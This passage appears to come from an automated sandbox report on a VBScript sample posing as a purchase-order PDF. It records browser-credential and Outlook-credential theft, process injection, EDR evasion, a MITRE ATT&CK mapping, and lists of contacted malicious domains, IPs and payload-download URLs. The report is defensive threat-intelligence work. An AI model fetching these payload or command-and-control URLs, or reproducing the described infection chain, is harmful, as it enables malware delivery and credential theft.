        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\where.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information221
        Scripting        		Valid Accounts11
        Windows Management Instrumentation        		221
        Scripting        		1
        Abuse Elevation Control Mechanism        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		2
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory114
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution        		Logon Script (Windows)512
        Process Injection        		4
        Obfuscated Files or Information        		Security Account Manager131
        Security Software Discovery        		SMB/Windows Admin Shares1
        Email Collection        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        Command and Scripting Interpreter        		Login HookLogin Hook1
        Software Packing        		NTDS2
        Process Discovery        		Distributed Component Object ModelInput Capture5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts2
        PowerShell        		Network Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets41
        Virtualization/Sandbox Evasion        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
        Process Injection        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555634 Sample: PO-DC13112024_pdf.vbs Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 45 www.030002350.xyz 2->45 47 www.yc791022.asia 2->47 49 14 other IPs or domains 2->49 57 Suricata IDS alerts for network traffic 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 Multi AV Scanner detection for submitted file 2->61 65 9 other signatures 2->65 12 wscript.exe 1 2->12         started        signatures3 63 Performs DNS queries to domains with low reputation 45->63 process4 signatures5 79 VBScript performs obfuscated calls to suspicious functions 12->79 81 Suspicious powershell command line found 12->81 83 Wscript starts Powershell (via cmd or directly) 12->83 85 2 other signatures 12->85 15 powershell.exe 7 12->15         started        process6 signatures7 95 Suspicious powershell command line found 15->95 97 Suspicious execution chain found 15->97 99 Found suspicious powershell code related to unpacking or dynamic code loading 15->99 18 powershell.exe 14 25 15->18         started        22 conhost.exe 15->22         started        process8 dnsIp9 51 103.20.102.62, 49704, 80 VASAICABLEPVTLTD-AS-INVasaiCablePvtLtdIN unknown 18->51 53 raw.githubusercontent.com 185.199.111.133, 443, 49705 FASTLYUS Netherlands 18->53 67 Writes to foreign memory regions 18->67 69 Injects a PE file into a foreign processes 18->69 71 Loading BitLocker PowerShell Module 18->71 24 RegAsm.exe 18->24         started        signatures10 process11 signatures12 73 Maps a DLL or memory area into another process 24->73 27 WKOyCvoOlM.exe 24->27 injected process13 signatures14 75 Maps a DLL or memory area into another process 27->75 77 Found direct / indirect Syscall (likely to bypass EDR) 27->77 30 where.exe 13 27->30         started        process15 signatures16 87 Tries to steal Mail credentials (via file / registry access) 30->87 89 Tries to harvest and steal browser information (history, passwords, etc) 30->89 91 Modifies the context of a thread in another process (thread injection) 30->91 93 3 other signatures 30->93 33 WKOyCvoOlM.exe 30->33 injected 37 firefox.exe 30->37         started        process17 dnsIp18 39 www.nimil.info 203.161.46.205, 63495, 63496, 63497 VNPT-AS-VNVNPTCorpVN Malaysia 33->39 41 www.yc791022.asia 101.35.209.183, 63491, 63492, 63493 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 33->41 43 3 other IPs or domains 33->43 55 Found direct / indirect Syscall (likely to bypass EDR) 33->55 signatures19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PO-DC13112024_pdf.vbs3%ReversingLabs
        PO-DC13112024_pdf.vbs10%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.nimil.info/gdpp/?X8wps=HD9ptle8L&qb6h=XNlLlzJ611biWBDnQnCeFZ6NVZ4xLjWXfr+0L15v/dkoQ7LxqA4db7MsNS0iTnnZ4s3kssINbHg5oGi7TlfLVlZQ57t8NMxb4MyHODvld5yYZYMDALlCTAgJ47pyJF8rKg==0%Avira URL Cloudsafe
        http://www.030002350.xyz/wrcq/0%Avira URL Cloudsafe
        http://103.20.102.620%Avira URL Cloudsafe
        http://www.030002350.xyz0%Avira URL Cloudsafe
        http://www.030002350.xyz/wrcq/?qb6h=0aBKMIuxMWsDZlZuGCNWGAisa+F3tvB0xMbS2kgCUdLh7rFDbnNAXehk8UbfWJO3lEanFmC09f09BQpsWN4gqHRUU5ElviQXwZTk2Xd/dFN8TxdFGzfCv1WAKHEC3ArfOQ==&X8wps=HD9ptle8L0%Avira URL Cloudsafe
        http://www.yc791022.asia/grmn/?qb6h=GvVCyhHHBwWm3Wiqs6T1+HSOrEGLSLVs90U44aOn+V5a+alxbue2HRsnEZvT1CUlYqTASXI2DXs3J4l64Md/MUcibXuAbURyjOW4TtuxIV2IutBvJyuUjqtFtGqljQIKAQ==&X8wps=HD9ptle8L0%Avira URL Cloudsafe
        http://www.nimil.info/gdpp/0%Avira URL Cloudsafe
        http://www.yc791022.asia/grmn/0%Avira URL Cloudsafe
        http://www.bcg.services/f3nk/?X8wps=HD9ptle8L&qb6h=v6+LTBEbPC2R85sFOmmbFC2Q/XGqyVy+lLBawY5mHj8QlUcwrm67JADjHek/seltQEUToGC/qYQit/V96/0oCLxc35by5p8gg2oFcQQLjMbf4RKBZtC51re3Q6vWyy22Hg==0%Avira URL Cloudsafe
        http://103.20.102.62/new_img.jpg0%Avira URL Cloudsafe
        http://www.5tuohbpzyj9.buzz/c6yl/0%Avira URL Cloudsafe
        http://www.5tuohbpzyj9.buzz/c6yl/?qb6h=QAykvSbKcm9a/Zd756st6oc0c2ndg18QAahNUeLfrY6eiOHcgN8hz9hRbXFDsZyrs9wVKyWLGfVe8RlZjLvC3xYEXrLC/N5rcVQ70kVg4GEX58Hw+NfPJKYlgF2/w0JeMA==&X8wps=HD9ptle8L0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        raw.githubusercontent.com
        		185.199.111.133
        		truefalse
          		high
          www.yc791022.asia
          		101.35.209.183
          		truetrue
            		unknown
            b1-3-r111.kunlundns.top
            		43.155.76.124
            		truetrue
              		unknown
              www.bcg.services
              		199.59.243.227
              		truetrue
                		unknown
                www.5tuohbpzyj9.buzz
                		156.232.181.155
                		truetrue
                  		unknown
                  www.nimil.info
                  		203.161.46.205
                  		truetrue
                    		unknown
                    www.030002350.xyz
                    		161.97.142.144
                    		truetrue
                      		unknown
                      241.42.69.40.in-addr.arpa
                      		unknown
                      		unknownfalse
                        		high
                        www.nuy25c9t.sbs
                        		unknown
                        		unknownfalse
                          		unknown
                          www.alihones.lol
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.030002350.xyz/wrcq/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.nimil.info/gdpp/?X8wps=HD9ptle8L&qb6h=XNlLlzJ611biWBDnQnCeFZ6NVZ4xLjWXfr+0L15v/dkoQ7LxqA4db7MsNS0iTnnZ4s3kssINbHg5oGi7TlfLVlZQ57t8NMxb4MyHODvld5yYZYMDALlCTAgJ47pyJF8rKg==true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.yc791022.asia/grmn/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.bcg.services/f3nk/?X8wps=HD9ptle8L&qb6h=v6+LTBEbPC2R85sFOmmbFC2Q/XGqyVy+lLBawY5mHj8QlUcwrm67JADjHek/seltQEUToGC/qYQit/V96/0oCLxc35by5p8gg2oFcQQLjMbf4RKBZtC51re3Q6vWyy22Hg==true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.yc791022.asia/grmn/?qb6h=GvVCyhHHBwWm3Wiqs6T1+HSOrEGLSLVs90U44aOn+V5a+alxbue2HRsnEZvT1CUlYqTASXI2DXs3J4l64Md/MUcibXuAbURyjOW4TtuxIV2IutBvJyuUjqtFtGqljQIKAQ==&X8wps=HD9ptle8Ltrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.nimil.info/gdpp/true
                            • Avira URL Cloud: safe
                            		unknown
                            https://raw.githubusercontent.com/richie213/ani/refs/heads/main/jdikobc.txtfalse
                              		high
                              http://www.030002350.xyz/wrcq/?qb6h=0aBKMIuxMWsDZlZuGCNWGAisa+F3tvB0xMbS2kgCUdLh7rFDbnNAXehk8UbfWJO3lEanFmC09f09BQpsWN4gqHRUU5ElviQXwZTk2Xd/dFN8TxdFGzfCv1WAKHEC3ArfOQ==&X8wps=HD9ptle8Ltrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://103.20.102.62/new_img.jpgtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.5tuohbpzyj9.buzz/c6yl/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.5tuohbpzyj9.buzz/c6yl/?qb6h=QAykvSbKcm9a/Zd756st6oc0c2ndg18QAahNUeLfrY6eiOHcgN8hz9hRbXFDsZyrs9wVKyWLGfVe8RlZjLvC3xYEXrLC/N5rcVQ70kVg4GEX58Hw+NfPJKYlgF2/w0JeMA==&X8wps=HD9ptle8Ltrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabwhere.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.030002350.xyzWKOyCvoOlM.exe, 0000000A.00000002.3406481962.0000000004EB7000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://go.micropowershell.exe, 00000004.00000002.2244616127.00000127D548A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5B35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.microsoft.copowershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000004.00000002.2244616127.00000127D50EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5110000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://go.microspowershell.exe, 00000004.00000002.2244616127.00000127D5B35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.comwhere.exe, 00000008.00000002.3407014638.0000000007970000.00000004.00000800.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000005354000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3405063400.0000000002DB4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B7A4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://103.20.102.62powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://raw.githubusercontent.compowershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwhere.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contoso.com/powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csswhere.exe, 00000008.00000002.3405546672.000000000599C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3405063400.00000000033FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2612166769.0000020F40850000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2612166769.0000020F4086A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2612166769.0000020F40898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415powershell.exe, 00000002.00000002.2612166769.0000020F40D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243710855.00000127CD274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD365000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243758814.00000127CD280000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

